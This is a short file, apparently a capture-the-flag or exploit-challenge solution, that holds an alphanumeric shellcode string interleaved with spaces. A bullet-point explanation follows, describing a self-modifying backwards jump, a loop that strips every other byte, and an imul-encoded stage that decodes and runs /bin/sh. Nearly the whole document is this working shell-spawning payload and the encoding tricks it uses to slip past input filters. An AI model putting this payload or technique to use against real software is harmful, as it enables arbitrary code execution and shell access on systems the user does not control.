shellcode.txt

5 c at 5 b at jut Yet At At At At At At At At At At At At Pt Pt jut jut jut jut Qt jut at 111 1 t t t t t t t t t t t t t t t t Pt Pt Pt Pt jut j j j j at Bet At j Qt Rt St j j j j at 4 Kt Qt Qt Rt St j j Pt j at 311 1 t t 321 1 111 1 Bet Bet At t Qt Yet u h a a a a Q X 4 y P Y I I I I I I I I I I I I I I I I I 7 Q Z j A X P 0 A 0 A k A A Q 2 A B 2 B B 0 B B A B X P 8 A B u J I 4 q Y P M I F 0 u 8 V O v O 3 C 5 8 U 8 T o P b b I 2 N l I i s R p q C K 9 y q N P d K z m m P A A X X X X X X X X X X X X X

explanation of the shellcode:

• first part constructs a negative 8-bit number (>0x7f) then overwrites the operand of a jmp8 instruction with it so we can have a backwards jump
• part two is the loop that we just completed and it removes every other byte from the third stage that directly follows it. the third stage is an alphanumeric binsh shellcode but interleaved with spaces so each character is its own word.
• part three is an imul encoded /bin/sh shellcode that decodes itself and executes the final payload